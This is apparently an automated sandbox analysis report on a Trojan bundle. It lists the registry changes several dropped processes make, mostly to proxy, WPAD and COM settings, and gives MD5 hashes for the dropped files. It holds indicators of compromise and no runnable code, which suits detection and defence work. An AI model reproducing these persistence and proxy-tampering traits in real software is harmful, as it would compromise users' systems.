[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe:3268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "2C 3C 44 64 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 48 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process amisetup2899__9664.exe:3368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1430290658"
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"(Default)" = "{1CEE7E9E-B36C-4404-8341-EACC6687DA52}"
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionTime" = "33 5F AA 66 9A 83 D0 01"
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"(Default)" = "{1CEE7E9E-B36C-4404-8341-EACC6687DA52}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\Version]
"(Default)" = "1.0"
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0]
"(Default)" = "InstallerLib"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "2C 3C 44 64 9A 83 D0 01"
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}]
"(Default)" = "Inst Class"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\ProgID]
"(Default)" = "scalawag.wuther.1"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "amisetup2899__9664.exe"
[HKCR\scalawag.wuther\CurVer]
"(Default)" = "scalawag.wuther.1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe"
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\TypeLib]
"(Default)" = "{1cee7e9e-b36c-4404-8341-eacc6687da52}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 49 00 00 00 09 00 00 00 00 00 00 00"
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
"(Default)" = "IBoot"
[HKCR\scalawag.wuther.1\CLSID]
"(Default)" = "{c8c02f46-c416-4092-a52c-abb5232cb4b9}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
[HKCR\scalawag.wuther]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
"(Default)" = "IBoot"
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\VersionIndependentProgID]
"(Default)" = "scalawag.wuther"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"Version" = "1.0"
[HKCR\scalawag.wuther.1]
"(Default)" = "Inst Class"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following registry key(s):
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\Version]
[HKCR\scalawag.wuther\CurVer]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\VersionIndependentProgID]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\FLAGS]
[HKCR\scalawag.wuther.1\CLSID]
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\0]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}]
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\0\win32]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\Programmable]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\TypeLib]
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
[HKCR\scalawag.wuther.1]
[HKCR\scalawag.wuther]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\HELPDIR]
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\ProgID]
The Trojan deletes the following value(s) in system registry:
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
"ServerExecutable"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process GOSafer.exe:3284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKLM\System\CurrentControlSet\Services\gosaferdrv]
"Tag" = "17"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 06 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "21 B7 48 6B 9A 83 D0 01"
[HKLM\SOFTWARE\GOSafer]
"instid" = "OuKz1Yi6BxlXdCQ8IZpYGGBgz2TyMvRv"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "10 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process WNet.exe:3080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\ssfilterdrv]
"Tag" = "13"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "22 FE 3B 6A 9A 83 D0 01"
[HKLM\SOFTWARE\WNet]
"instid" = "XjbAXMdlReRSpd1DDxs3QmrHlGV9Q488"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0C 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process 310714_is.exe:948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "25 CC 85 1E BF 72 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer]
"GlobalAssocChangedCounter" = "35"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 45 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
cd594b7e64bbb60804076c1434a1ec09 | c:\Program Files (x86)\ActSys\ActSys.exe |
d6f19bc6d4f54dfae1a4d4b96d12f1c1 | c:\Program Files (x86)\ActSys\ProtocolFilters.dll |
bec584303ce252396a3731ce5bdcf03a | c:\Program Files (x86)\ActSys\libeay32.dll |
d8305b5c2810e2e135f87bb32d62810e | c:\Program Files (x86)\ActSys\nfapi.dll |
01b5780505301ada6dc102fb77b2298c | c:\Program Files (x86)\ActSys\nfregdrv.exe |
f40cddc932f47b3e406d0c4fde03dfd8 | c:\Program Files (x86)\ActSys\remove_ActSys.exe |
da6f5524c9e5b5804dc5117022d08331 | c:\Program Files (x86)\ActSys\ssleay32.dll |
84887ac0f5fde399c83b3bc5a7aaf097 | c:\Program Files (x86)\CashReminder\CashReminder.exe |
d68a76ab1ebbbdde37bb12bd68b1639d | c:\Program Files (x86)\CashReminder\ProtocolFilters.dll |
bec584303ce252396a3731ce5bdcf03a | c:\Program Files (x86)\CashReminder\libeay32.dll |
d8305b5c2810e2e135f87bb32d62810e | c:\Program Files (x86)\CashReminder\nfapi.dll |
01b5780505301ada6dc102fb77b2298c | c:\Program Files (x86)\CashReminder\nfregdrv.exe |
da6f5524c9e5b5804dc5117022d08331 | c:\Program Files (x86)\CashReminder\ssleay32.dll |
f2f4090a44f85db92f9ec40483c7e502 | c:\Program Files (x86)\CashReminder\uninstall.exe |
45c9d00b83bcafd991f95eeac6097b7f | c:\Program Files (x86)\DesProtetor\DesProtetor.exe |
9a0c59099f8589ee0f026bcd42c06800 | c:\Program Files (x86)\DesProtetor\ProtocolFilters.dll |
3e1176c39139baf084e9a69d6d50438a | c:\Program Files (x86)\DesProtetor\libeay32.dll |
0e2ca4f2d3f113f006d5801319a626de | c:\Program Files (x86)\DesProtetor\nfapi.dll |
92a6df47283b49b207045fa7a4502bc1 | c:\Program Files (x86)\DesProtetor\nfregdrv.exe |
4fbf0e0dd471ce2945c33c14e14269ff | c:\Program Files (x86)\DesProtetor\ssleay32.dll |
28ca54fa79bb30e8eef8ebd5053ee746 | c:\Program Files (x86)\DesProtetor\uninst.exe |
9a0c59099f8589ee0f026bcd42c06800 | c:\Program Files (x86)\GOSafer\ProtocolFilters.dll |
c1908176b417b29dcfcfc15d7de9de63 | c:\Program Files (x86)\GOSafer\gosafer.exe |
3e1176c39139baf084e9a69d6d50438a | c:\Program Files (x86)\GOSafer\libeay32.dll |
0e2ca4f2d3f113f006d5801319a626de | c:\Program Files (x86)\GOSafer\nfapi.dll |
92a6df47283b49b207045fa7a4502bc1 | c:\Program Files (x86)\GOSafer\nfregdrv.exe |
4fbf0e0dd471ce2945c33c14e14269ff | c:\Program Files (x86)\GOSafer\ssleay32.dll |
9d37509b72dc3143feffc3f1977c9d7d | c:\Program Files (x86)\GOSafer\uninst.exe |
9a0c59099f8589ee0f026bcd42c06800 | c:\Program Files (x86)\WNet\ProtocolFilters.dll |
45571677457a9bfd49aadada0fd91ca8 | c:\Program Files (x86)\WNet\WNet.exe |
3e1176c39139baf084e9a69d6d50438a | c:\Program Files (x86)\WNet\libeay32.dll |
8249371485714e1f45a4b1c67002cf47 | c:\Program Files (x86)\WNet\nfapi.dll |
92a6df47283b49b207045fa7a4502bc1 | c:\Program Files (x86)\WNet\nfregdrv.exe |
4fbf0e0dd471ce2945c33c14e14269ff | c:\Program Files (x86)\WNet\ssleay32.dll |
6200d767a099a1744e99abae47958a42 | c:\Program Files (x86)\WNet\uninst.exe |
0183c88583bbf1c99d67acce017c9beb | c:\Program Files (x86)\XTab\BrowerWatchCH.dll |
fd0b82d24d162e240931cfd5540d3021 | c:\Program Files (x86)\XTab\BrowerWatchFF.dll |
5785680870eff9ba7b4f58c726552013 | c:\Program Files (x86)\XTab\BrowserAction.dll |
b124f96efd0010e4f7e262f08519e9e4 | c:\Program Files (x86)\XTab\CmdShell.exe |
77ccf1c943665ececf9a5ce699560500 | c:\Program Files (x86)\XTab\HPNotify.exe |
4a345a11cc64ab72cb09ff391611dad0 | c:\Program Files (x86)\XTab\IeWatchDog.dll |
cc709fa63d5a536a2f8275c0cea39070 | c:\Program Files (x86)\XTab\ProtectService.exe |
efa257c845943b84922117758c955434 | c:\Program Files (x86)\XTab\SupTab.dll |
3e29914113ec4b968ba5eb1f6d194a0a | c:\Program Files (x86)\XTab\msvcp110.dll |
4ba25d2cbe1587a841dcfb8c8c4a6ea6 | c:\Program Files (x86)\XTab\msvcr110.dll |
e29708f3781e5790424ca59a0fbb1bd3 | c:\Program Files (x86)\XTab\uninstall.exe |
8a8f5ebe2fd9c2e6325723209b9cdf32 | c:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe |
8a8f5ebe2fd9c2e6325723209b9cdf32 | c:\Users\All Users\WindowsMangerProtect\ProtectWindowsManager.exe |
d61776c4928db339475ab6a773585c9d | c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_am2[1].exe |
